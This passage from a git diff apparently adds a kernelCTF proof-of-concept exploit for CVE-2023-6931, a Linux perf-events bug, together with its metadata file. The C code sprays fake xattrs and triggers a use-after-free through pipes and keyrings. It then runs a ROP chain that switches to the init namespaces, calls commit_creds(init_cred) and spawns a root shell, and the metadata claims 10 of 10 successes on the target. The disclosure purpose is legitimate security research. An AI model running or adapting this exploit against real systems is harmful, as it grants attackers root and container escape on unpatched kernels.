9, XATTR_PREFIX_SECURITY, 9); + sprintf(zz+0x40,"haha%d", 3); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, zz); + removexattr(fname, name); + puts("[+] Spraying Fake xattr"); + char y[0x10000] = { 0, }; + for(int i = 0x11; i <= 100; i++){ + memset(y, 'y', 0x40); + memset(y, 't', 0x38); + memcpy(y+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(y+0x40,"haha%d",i); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + memset(value, 'B', 0x3000); + for(int j = 0; j < 4; j++) + ((uint64_t *)value)[j] = 0; + ((uint64_t *)value)[2] = xattr + 0x20000 + 0x40 - 0x30; + ((uint64_t *)value)[3] = 0; + ((uint64_t *)value)[4] = xattr + 0x20000 + 0x38 - 0x30; + ((uint64_t *)value)[5] = 0x10; + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + } + + memset(y, 'y', 0x40); + memset(y, 't', 0x38); + memcpy(y+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(y+0x40,"zzz%d", 0); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + memset(value, 'C', 0x3000); + ((uint64_t *)value)[0] = xattr + 0x18000; + ((uint64_t 
*)value)[1] = xattr + 0x18000; + ((uint64_t *)value)[2] = leakname; + ((uint64_t *)value)[3] = 0x3000; + ((uint64_t *)value)[4] = xattr + 0x20000 + 0x80; + ((uint64_t *)value)[5] = xattr + 0x20000 + 0x60; + ((uint64_t *)value)[6] = leakname; + ((uint64_t *)value)[7] = 0x3000; + ((uint64_t *)value)[8] = xattr + 0x20000 + 0x40; + ((uint64_t *)value)[12] = xattr + 0x18000; + ((uint64_t *)value)[13] = xattr + 0x20000 + 0x40; + ((uint64_t *)value)[14] = leakname; + ((uint64_t *)value)[15] = 0x3000; + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + puts("[+] Making UAF"); + memset(zz, 'y', 0x40); + memset(zz, 't', 0x38); + memcpy(zz+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(zz+0x40,"haha%d", 93); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, zz); + removexattr(fname, name); + read(group_leader, count, 0xffff); + + sprintf(y,"zzzlolol%d", 0); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + removexattr(fname, name); + release_pipe(pipepipe); + + char value1[0x5000] = {0, }; + memcpy(value1 + 8, value, 0x3000); + + key_serial_t *keys = calloc(0x10, sizeof(key_serial_t)); + keys[0] = sys_add_key("user", "key_0", value1, 0x3000, KEY_SPEC_PROCESS_KEYRING); + memset(zz, 'y', 0x40); + memset(zz, 't', 0x38); + memcpy(zz+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(zz+0x40,"haha%d", 0); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, zz); + removexattr(fname, name); + + struct pipeio *uafpipe = create_pipeio(); + resize_pipe(uafpipe, 0x1000 * 0x100); + write_pipe(uafpipe, "AAAAAAAA", 8); + + if(sys_keyctl(KEYCTL_REVOKE, keys[0]) == -1){ + puts("[-] Exploit Fail"); + exit(-1); + } + + sleep(1); + + uint64_t jmpgadget = kbase + 0xcafa62; //0xffffffff81cafa62 : push rsi ; jmp qword ptr [rsi + 0x66] + uint64_t pop_rsp = kbase + 0xb0ab1c; //0xffffffff81b0ab19 : add dword ptr [rax - 0x75], ecx ; pop rsp ; ret + uint64_t pop_rdi = kbase + 0xb307d; //0xffffffff810b307d : pop rdi ; ret + uint64_t pop_rsi = kbase + 0x24cc0e; //0xffffffff8124cc0c : or al, ch ; pop rsi ; ret + uint64_t mov_rdi_rax_pop_rbx = kbase + 0xd9883d; //0xffffffff81d9883d : mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605280, 0xffffffff82605280 is ret + uint64_t init_nsproxy = kbase + 0x2a76900; + uint64_t switch_task_namespaces = kbase + 0x1c5a20; + uint64_t find_task_by_vpid = kbase + 0x1bde50; + uint64_t init_cred = kbase + 0x2a76b40; + uint64_t commit_creds = kbase + 0x1c7590; + uint64_t msleep = kbase + 0x232f10; + uint64_t kpti_trampoline = kbase + 0x1401146; + uint64_t rop[0x100] = {0, }; + + sprintf(y,"uafzzlol%d", 0); + ((uint64_t *)value)[0] = pop_rsp; + ((uint64_t *)value)[1] = xattr + 0x20200; + ((uint64_t *)value)[2] = xattr + 0x20100; + ((uint64_t *)value)[8] = xattr + 0x18000; + ((uint64_t *)value)[9] = xattr + 0x18000; + ((uint64_t *)value)[10] = leakname; + ((uint64_t *)value)[11] = 0x3000; + ((uint64_t *)value)[33] = jmpgadget; + + *(uint64_t *)(value + 0x66) = pop_rsp; + + backup_rv(); + + int ridx = 0; + rop[ridx++] = pop_rdi; + rop[ridx++] = 1; + rop[ridx++] = find_task_by_vpid; + rop[ridx++] = mov_rdi_rax_pop_rbx; + rop[ridx++] = 0; + rop[ridx++] = pop_rsi; + rop[ridx++] = init_nsproxy; + rop[ridx++] = switch_task_namespaces; + rop[ridx++] = pop_rdi; + rop[ridx++] = init_cred; + rop[ridx++] = commit_creds; + rop[ridx++] = kpti_trampoline; + rop[ridx++] = 0; + rop[ridx++] = 0; + rop[ridx++] = (uint64_t)shell; + rop[ridx++] = rv.user_cs; + rop[ridx++] = rv.user_rflags; + rop[ridx++] = rv.user_rsp; + 
rop[ridx++] = rv.user_ss; + memcpy(value+0x200, rop, 0x100); + + name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + + release_pipe(uafpipe); + + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/metadata.json new file mode 100644 index 00000000..a3421903 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/metadata.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp198"], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b", + "cve": "CVE-2023-6931", + "affected_versions": ["3.16 - 6.7"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": ["CONFIG_PERF_EVENTS"] + } + }, + "exploits": { + "mitigation-v3b-6.1.55": { + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeded on 10/10 tries against target instance." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/original.tar.gz new file mode 100644 index 00000000..3e7bebd7 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/original.tar.gz differ